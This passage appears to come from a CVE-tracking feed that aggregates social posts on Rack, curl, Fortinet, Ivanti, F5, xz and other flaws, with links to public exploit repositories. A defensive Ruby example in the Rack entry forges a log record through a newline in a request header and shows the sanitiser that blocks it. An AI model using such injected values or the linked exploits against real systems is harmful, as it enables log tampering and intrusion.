Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

##

CVE-2025-0725
(7.3 HIGH)

EPSS: 0.21%

updated 2025-03-07T03:31:33

1 posts

When libcurl is asked to perform automatic gzip decompression of content-encoded HTTP responses with the `CURLOPT_ACCEPT_ENCODING` option, **using zlib 1.2.0.3 or older**, an attacker-controlled integer overflow would make libcurl perform a buffer overflow.

bagder@mastodon.social at 2025-04-23T22:04:19.000Z ##

Updated #curl bug bounty stats, six years in:

520 reports
78 confirmed security vulnerabilities
104 "informative" reports, bugs that weren't vulnerabilities
11 marked as "AI slop"

The rest were just different kinds of not applicable. Some more crazy than others.

The latest confirmed curl vulnerability (CVE-2025-0725) was reported 90 days ago.

There are currently zero issues in our queue.

curl.se/docs/bugbounty.html

##

CVE-2025-27111
(0 None)

EPSS: 0.12%

updated 2025-03-04T16:15:40.487000

4 posts

Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs unsanitised header values from the X-Sendfile-Type header. An attacker can exploit this by injecting escape sequences (such as newline characters) into the header, resulting in log injection. This vulnerability is fixed in 2.2.12, 3.0.13, and 3.1.11.

Sempf at 2025-04-26T04:01:08.061Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

CVE-2022-42475
(9.8 CRITICAL)

EPSS: 93.18%

updated 2025-02-24T18:32:12

1 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

7 repos

https://github.com/AiK1d/CVE-2022-42475-RCE-POC

https://github.com/bryanster/ioc-cve-2022-42475

https://github.com/scrt/cve-2022-42475

https://github.com/Mustafa1986/cve-2022-42475-Fortinet

https://github.com/0xhaggis/CVE-2022-42475

https://github.com/Amir-hy/cve-2022-42475

https://github.com/natceil/cve-2022-42475

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2025-25184
(0 None)

EPSS: 0.10%

updated 2025-02-14T20:15:34.350000

4 posts

Rack provides an interface for developing web applications in Ruby. Prior to versions 2.2.11, 3.0.12, and 3.1.10, Rack::CommonLogger can be exploited by crafting input that includes newline characters to manipulate log entries. The supplied proof-of-concept demonstrates injecting malicious content into logs. When a user provides the authorization credentials via Rack::Auth::Basic, if success, the
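
The Rack::Sendfile entry above (raw X-Sendfile-Type header values reaching the log) and this Rack::CommonLogger entry (CVE-2025-25184) are the same bug class: an attacker-controlled request value is written to a line-oriented log without control characters being escaped, so a CR/LF in the value terminates the real record and starts a forged one. The Ruby below is an added example, not Rack's code and not taken from the OPSWAT write-up: the ToyLogger middleware, its log line format, the parser, the addresses 203.0.113.7 and 10.0.0.1, and the request itself are all constructed for illustration. It runs the same request through an unsanitised and a sanitised logger and shows that the forged record is the only one a naive parser accepts.

```ruby
# Added example (not Rack's own code): log injection through a CR/LF in
# attacker-controlled request data, and the escaping that closes it.
require 'stringio'

# Escape C0 control characters (CR and LF included), DEL and backslash so a
# logged field can never end the current record or begin a new one, and so
# an escaped "\x0A" cannot be confused with a literal backslash in the input.
# Assumption: the log consumer treats "\n" as the record separator.
def sanitize_log_field(value)
  value.to_s.gsub(/[\x00-\x1f\x7f\\]/) do |c|
    c == '\\' ? '\\\\' : format('\\x%02X', c.ord)
  end
end

# Minimal Rack-style logging middleware. The line format is hypothetical;
# Rack's real CommonLogger and Rack::Sendfile differ in detail. The only
# thing that matters here is that request data is interpolated into a line.
class ToyLogger
  LINE = '%<addr>s - "%<method>s %<path>s" %<status>d sendfile-type="%<sendfile>s"'

  def initialize(app, io, sanitize:)
    @app = app
    @io = io
    @sanitize = sanitize
  end

  def call(env)
    status, headers, body = @app.call(env)
    fields = {
      addr:     env['REMOTE_ADDR'],
      method:   env['REQUEST_METHOD'],
      path:     env['PATH_INFO'],
      status:   status,
      sendfile: env['HTTP_X_SENDFILE_TYPE'].to_s # header supplied by the client
    }
    if @sanitize
      fields = fields.transform_values { |v| v.is_a?(String) ? sanitize_log_field(v) : v }
    end
    @io.puts(format(LINE, fields))
    [status, headers, body]
  end
end

INNER_APP = ->(_env) { [200, { 'content-type' => 'text/plain' }, ['ok']] }

# Constructed request. The X-Sendfile-Type value carries a newline followed
# by a fabricated record that blames 10.0.0.1 for a request it never made;
# the trailing quote of the real record completes the forged one.
ATTACK_ENV = {
  'REMOTE_ADDR'          => '203.0.113.7',
  'REQUEST_METHOD'       => 'GET',
  'PATH_INFO'            => '/download',
  'HTTP_X_SENDFILE_TYPE' => "X-Accel-Redirect\n10.0.0.1 - \"GET /admin\" 200 sendfile-type=\""
}.freeze

# Run one request through the middleware and return the records that a
# line-oriented log consumer would see.
def log_lines_for(env, sanitize:)
  io = StringIO.new
  ToyLogger.new(INNER_APP, io, sanitize: sanitize).call(env)
  io.string.split("\n")
end

# The parser a log pipeline might apply to each record. The forged record
# passes it; the truncated real record does not.
LOG_RE = /\A(?<addr>\S+) - "(?<method>[A-Z]+) (?<path>[^"]*)" (?<status>\d{3}) sendfile-type="(?<sendfile>[^"]*)"\z/

def parse_log_line(line)
  m = LOG_RE.match(line)
  m && m.named_captures.transform_keys(&:to_sym)
end

if __FILE__ == $PROGRAM_NAME
  puts 'unsanitised logger:'
  log_lines_for(ATTACK_ENV, sanitize: false).each { |l| puts "  #{l}" }
  puts 'sanitised logger:'
  log_lines_for(ATTACK_ENV, sanitize: true).each { |l| puts "  #{l}" }
end
```

Run as a script, the unsanitised logger emits two records for one request, and only the forged one parses cleanly, which is also the detection signal worth alerting on: a record whose quoted field never closes means something wrote a control character into the log. The sanitised logger emits a single record with the newline rendered as `\x0A`, so the attacker's text survives as evidence but cannot masquerade as a record of its own.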

Sempf at 2025-04-26T04:01:08.061Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

CVE-2025-0282
(9.1 CRITICAL)

EPSS: 92.34%

updated 2025-01-28T18:32:27

7 posts

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

10 repos

https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

https://github.com/44xo/CVE-2025-0282

https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser

https://github.com/AdaniKamal/CVE-2025-0282

https://github.com/almanatra/CVE-2025-0282

https://github.com/watchtowrlabs/CVE-2025-0282

https://github.com/punitdarji/Ivanti-CVE-2025-0282

https://github.com/sfewer-r7/CVE-2025-0282

https://github.com/rxwx/pulse-meter

https://github.com/AnonStorks/CVE-2025-0282-Full-version

ClubTeleMatique@mstdn.social at 2025-04-25T17:15:46.000Z ##

Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo #news #IT

##

AAKL at 2025-04-25T14:08:50.422Z ##

JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure blogs.jpcert.or.jp/en/2025/04/

More:

The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo @thehackernews

##

jos1264@social.skynetcloud.site at 2025-04-25T20:00:03.000Z ##

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks – Source:thehackernews.com ciso2ciso.com/dslogdrat-malwar #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #DslogdRAT

##

jos1264@social.skynetcloud.site at 2025-04-25T09:40:02.000Z ##

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks thehackernews.com/2025/04/dslo

##

CVE-2018-0171
(9.8 CRITICAL)

EPSS: 89.10%

updated 2025-01-27T21:31:51

1 posts

A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by se

2 repos

https://github.com/hellowenying/CVE2018-0171

https://github.com/AlrikRr/Cisco-Smart-Exploit

hrbrmstr@mastodon.social at 2025-04-24T13:57:04.000Z ##

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

##

CVE-2024-21762
(9.8 CRITICAL)

EPSS: 91.37%

updated 2024-11-29T15:23:32.167000

1 posts

An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or co

8 repos

https://github.com/cleverg0d/CVE-2024-21762-Checker

https://github.com/XiaomingX/cve-2024-21762-poc

https://github.com/h4x0r-dz/CVE-2024-21762

https://github.com/BishopFox/cve-2024-21762-check

https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check

https://github.com/rdoix/cve-2024-21762-checker

https://github.com/d0rb/CVE-2024-21762

https://github.com/bsekercioglu/cve2024-21762-ShodanChecker

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2024-9441
(9.8 CRITICAL)

EPSS: 57.36%

updated 2024-10-02T21:30:35

1 posts

The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS command injection vulnerability. A remote and unauthenticated attacker can execute arbitrary OS commands via the login_id parameter when invoking the forgot_password functionality over HTTP.

4 repos

https://github.com/adhikara13/CVE-2024-9441

https://github.com/p33d/CVE-2024-9441

https://github.com/jk-mayne/CVE-2024-9441-Checker

https://github.com/XiaomingX/cve-2024-9441-poc

beyondmachines1@infosec.exchange at 2025-04-25T12:01:35.000Z ##

Nice reports critical flaw in Linear eMerge E3

Critical vulnerability CVE-2024-9441 (CVSS 9.8) in Nice's Linear eMerge E3 access control system allows unauthenticated remote attackers to execute arbitrary OS commands through the login_id parameter in the forgot_password functionality. All versions through 1.00-07 affected and no patch is currently available.

**If you are using Nice Linear eMerge E3 access control system, be aware that it's vulnerable. Make sure it's isolated from the internet and accessible only from trusted networks, and reach out to the vendor for patch timing.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2024-6235
(CVSS UNKNOWN)

EPSS: 21.21%

updated 2024-07-31T05:02:58

1 posts

Sensitive information disclosure in NetScaler Console

Nuclei template

catc0n@infosec.exchange at 2025-04-22T21:22:18.000Z ##

Some nifty n-day vuln analysis from the team (Calum Hutton) this week: Citrix NetScaler Console CVE-2024-6235 allows an unauthenticated attacker to obtain an admin-level session ID from an internal API and use this to create other admin users on the system.

attackerkb.com/assessments/3bf

##

CVE-2020-5902
(9.8 CRITICAL)

EPSS: 94.44%

updated 2024-07-25T18:33:36

1 posts

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Nuclei template

57 repos

https://github.com/cybersecurityworks553/scanner-CVE-2020-5902

https://github.com/yasserjanah/CVE-2020-5902

https://github.com/ar0dd/CVE-2020-5902

https://github.com/jas502n/CVE-2020-5902

https://github.com/dunderhay/CVE-2020-5902

https://github.com/qiong-qi/CVE-2020-5902-POC

https://github.com/Shu1L/CVE-2020-5902-fofa-scan

https://github.com/GovindPalakkal/EvilRip

https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker

https://github.com/corelight/CVE-2020-5902-F5BigIP

https://github.com/Al1ex/CVE-2020-5902

https://github.com/0xAbdullah/CVE-2020-5902

https://github.com/qlkwej/poc-CVE-2020-5902

https://github.com/superzerosec/cve-2020-5902

https://github.com/wdlid/CVE-2020-5902-fix

https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902

https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker

https://github.com/west9b/F5-BIG-IP-POC

https://github.com/r0ttenbeef/cve-2020-5902

https://github.com/dnerzker/CVE-2020-5902

https://github.com/inho28/CVE-2020-5902-F5-BIGIP

https://github.com/jiansiting/CVE-2020-5902

https://github.com/ltvthang/CVE-2020-5903

https://github.com/34zY/APT-Backpack

https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter

https://github.com/rockmelodies/CVE-2020-5902-rce-gui

https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner

https://github.com/jinnywc/CVE-2020-5902

https://github.com/yassineaboukir/CVE-2020-5902

https://github.com/PushpenderIndia/CVE-2020-5902-Scanner

https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP

https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902

https://github.com/GoodiesHQ/F5-Patch

https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability

https://github.com/aqhmal/CVE-2020-5902-Scanner

https://github.com/murataydemir/CVE-2020-5902

https://github.com/renanhsilva/checkvulnCVE20205902

https://github.com/rwincey/CVE-2020-5902-NSE

https://github.com/ajdumanhug/CVE-2020-5902

https://github.com/haisenberg/CVE-2020-5902

https://github.com/momika233/cve-2020-5902

https://github.com/sv3nbeast/CVE-2020-5902_RCE

https://github.com/z3n70/CVE-2020-5902

https://github.com/flyopenair/CVE-2020-5902

https://github.com/zhzyker/CVE-2020-5902

https://github.com/k3nundrum/CVE-2020-5902

https://github.com/JSec1337/RCE-CVE-2020-5902

https://github.com/freeFV/CVE-2020-5902-fofa-scan

https://github.com/halencarjunior/f5scan

https://github.com/zhzyker/exphub

https://github.com/MrCl0wnLab/checker-CVE-2020-5902

https://github.com/theLSA/f5-bigip-rce-cve-2020-5902

https://github.com/Any3ite/CVE-2020-5902-F5BIG

https://github.com/cristiano-corrado/f5_scanner

https://github.com/nsflabs/CVE-2020-5902

https://github.com/dwisiswant0/CVE-2020-5902

https://github.com/amitlttwo/CVE-2020-5902

hrbrmstr@mastodon.social at 2025-04-24T13:57:04.000Z ##

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

##

CVE-2024-6407
(9.8 CRITICAL)

EPSS: 0.14%

updated 2024-07-11T12:30:56

1 posts

CWE-200: Information Exposure vulnerability exists that could cause disclosure of credentials when a specially crafted message is sent to the device.

beyondmachines1@infosec.exchange at 2025-04-23T13:01:07.000Z ##

Schneider Electric reports critical flaw in Wiser Home Controller WHC-5918A

The Schneider Electric Wiser Home Controller WHC-5918A contains a critical security vulnerability (CVE-2024-6407, CVSS 9.8) allowing attackers to extract sensitive credentials by sending specially crafted messages. Schneider is recommending complete replacement of the discontinued device with their newer C-Bus Home Controller model as no security patches will be released.

**If you are using Schneider Electric Wiser Home Controller WHC-5918A devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2023-27997
(9.8 CRITICAL)

EPSS: 91.01%

updated 2024-04-04T04:45:33

1 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically c

10 repos

https://github.com/delsploit/CVE-2023-27997

https://github.com/BishopFox/CVE-2023-27997-check

https://github.com/rio128128/CVE-2023-27997-POC

https://github.com/TechinsightsPro/ShodanFortiOS

https://github.com/puckiestyle/cve-2023-27997

https://github.com/lexfo/xortigate-cve-2023-27997

https://github.com/onurkerembozkurt/fgt-cve-2023-27997-exploit

https://github.com/imbas007/CVE-2023-27997-Check

https://github.com/node011/CVE-2023-27997-POC

https://github.com/Cyb3rEnthusiast/CVE-2023-27997

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2024-3094
(10.0 CRITICAL)

EPSS: 90.84%

updated 2024-03-29T18:30:50

1 posts

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. The tarballs included extra .m4 files, which contained instructions for building with automake that did not exist in the repository. These instructions, through a series of complex obfuscations, extract a prebuilt object file from one of the test archives, which is then used to modify specific functions in t

Nuclei template

62 repos

https://github.com/badsectorlabs/ludus_xz_backdoor

https://github.com/been22426/CVE-2024-3094

https://github.com/emirkmo/xz-backdoor-github

https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer

https://github.com/r0binak/xzk8s

https://github.com/neuralinhibitor/xzwhy

https://github.com/jfrog/cve-2024-3094-tools

https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check

https://github.com/mightysai1997/CVE-2024-3094-info

https://github.com/0xlane/xz-cve-2024-3094

https://github.com/bioless/xz_cve-2024-3094_detection

https://github.com/iheb2b/CVE-2024-3094-Checker

https://github.com/harekrishnarai/xz-utils-vuln-checker

https://github.com/Horizon-Software-Development/CVE-2024-3094

https://github.com/crfearnworks/ansible-CVE-2024-3094

https://github.com/isuruwa/CVE-2024-3094

https://github.com/hackingetico21/revisaxzutils

https://github.com/przemoc/xz-backdoor-links

https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector

https://github.com/byinarie/CVE-2024-3094-info

https://github.com/robertdebock/ansible-playbook-cve-2024-3094

https://github.com/dah4k/CVE-2024-3094

https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker

https://github.com/ScrimForever/CVE-2024-3094

https://github.com/weltregie/liblzma-scan

https://github.com/wgetnz/CVE-2024-3094-check

https://github.com/robertdfrench/ifuncd-up

https://github.com/FabioBaroni/CVE-2024-3094-checker

https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094

https://github.com/buluma/ansible-role-cve_2024_3094

https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container

https://github.com/amlweems/xzbot

https://github.com/lockness-Ko/xz-vulnerable-honeypot

https://github.com/ackemed/detectar_cve-2024-3094

https://github.com/brinhosa/CVE-2024-3094-One-Liner

https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094

https://github.com/gustavorobertux/CVE-2024-3094

https://github.com/felipecosta09/cve-2024-3094

https://github.com/robertdebock/ansible-role-cve_2024_3094

https://github.com/reuteras/CVE-2024-3094

https://github.com/Juul/xz-backdoor-scan

https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check

https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-

https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits

https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione

https://github.com/pentestfunctions/CVE-2024-3094

https://github.com/XiaomingX/cve-2024-3094-xz-backdoor-exploit

https://github.com/bsekercioglu/cve2024-3094-Checker

https://github.com/Yuma-Tsushima07/CVE-2024-3094

https://github.com/shefirot/CVE-2024-3094

https://github.com/Fractal-Tess/CVE-2024-3094

https://github.com/Simplifi-ED/CVE-2024-3094-patcher

https://github.com/ashwani95/CVE-2024-3094

https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script

https://github.com/hazemkya/CVE-2024-3094-checker

https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker

https://github.com/DANO-AMP/CVE-2024-3094

https://github.com/mightysai1997/CVE-2024-3094

https://github.com/mesutgungor/xz-backdoor-vulnerability

https://github.com/teyhouse/CVE-2024-3094

https://github.com/galacticquest/cve-2024-3094-detect

https://github.com/Mustafa1986/CVE-2024-3094

arXiv_csSE_bot@mastoxiv.page at 2025-04-25T07:21:50.000Z ##

Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack

Piotr Przymus (Nicolaus Copernicus University in Torun, Poland), Thomas Durieux (TU Delft & Endor Labs, The Netherlands)
arxiv.org/abs/2504.17473 arxiv.org/pdf/2504.17473 arxiv.org/html/2504.17473

arXiv:2504.17473v1 Announce Type: new
Abstract: The digital economy runs on Open Source Software (OSS), with an estimated 90\% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline, analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.

#toXiv_bot_toot

##

CVE-2022-42889
(9.8 CRITICAL)

EPSS: 94.16%

updated 2024-01-19T20:49:34

1 posts

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included in

Nuclei template

49 repos

https://github.com/devenes/text4shell-cve-2022-42889

https://github.com/SeanWrightSec/CVE-2022-42889-PoC

https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889

https://github.com/MendDemo-josh/cve-2022-42889-text4shell

https://github.com/Sic4rio/CVE-2022-42889

https://github.com/sunnyvale-it/CVE-2022-42889-PoC

https://github.com/HKirito/CVE-2022-33980

https://github.com/smileostrich/Text4Shell-Scanner

https://github.com/Vulnmachines/text4shell-CVE-2022-42889

https://github.com/pwnb0y/Text4shell-exploit

https://github.com/kljunowsky/CVE-2022-42889-text4shell

https://github.com/Gotcha1G/CVE-2022-42889

https://github.com/dgor2023/cve-2022-42889-text4shell-docker

https://github.com/ClickCyber/cve-2022-42889

https://github.com/neerazz/CVE-2022-42889

https://github.com/YulinSec/t4scan

https://github.com/necroteddy/CVE-2022-42889

https://github.com/34006133/CVE-2022-42889

https://github.com/QAInsights/cve-2022-42889-jmeter

https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker

https://github.com/cxzero/CVE-2022-42889-text4shell

https://github.com/karthikuj/cve-2022-42889-text4shell-docker

https://github.com/joshbnewton31080/cve-2022-42889-text4shell

https://github.com/tulhan/commons-text-goat

https://github.com/akshayithape-devops/CVE-2022-42889-POC

https://github.com/808ale/CVE-2022-42889-Text4Shell-POC

https://github.com/stavrosgns/Text4ShellPayloads

https://github.com/aaronm-sysdig/text4shell-docker

https://github.com/jayaram-yalla/CVE-2022-42889-POC_TEXT4SHELL

https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker

https://github.com/kiralab/text4shell-scan

https://github.com/gokul-ramesh/text4shell-exploit

https://github.com/s3l33/CVE-2022-42889

https://github.com/korteke/CVE-2022-42889-POC

https://github.com/eunomie/cve-2022-42889-check

https://github.com/chainguard-dev/text4shell-policy

https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889

https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC

https://github.com/cryxnet/CVE-2022-42889-RCE

https://github.com/Afrouper/MavenDependencyCVE-Scanner

https://github.com/uk0/cve-2022-42889-intercept

https://github.com/rockmelodies/CVE-2022-42889

https://github.com/hotblac/text4shell

https://github.com/f0ng/text4shellburpscanner

https://github.com/Dima2021/cve-2022-42889-text4shell

https://github.com/humbss/CVE-2022-42889

https://github.com/securekomodo/text4shell-poc

https://github.com/chaudharyarjun/text4shell-exploit

https://github.com/DimaMend/cve-2022-42889-text4shell

SoLSec@mastodon.social at 2025-04-23T18:14:11.000Z ##

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 kitploit.com/2025/04/text4shel

##

CVE-2025-3132
(0 None)

EPSS: 0.00%

2 posts

N/A

1 repos

https://github.com/rxerium/CVE-2025-31324

AAKL at 2025-04-25T16:48:43.342Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable

##

CVE-2025-22234
(0 None)

EPSS: 0.00%

3 posts

N/A

CVE-2025-1763
(0 None)

EPSS: 0.00%

1 posts

N/A

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-2443
(0 None)

EPSS: 0.00%

1 posts

N/A

beyondmachines1@infosec.exchange at 2025-04-25T09:01:35.000Z ##

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2024-55571
(0 None)

EPSS: 0.00%

1 posts

N/A

cR0w@infosec.exchange at 2025-04-24T13:11:24.000Z ##

This SQLi in Centreon Web is from a month ago but the CVE was published today.

thewatch.centreon.com/latest-s

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

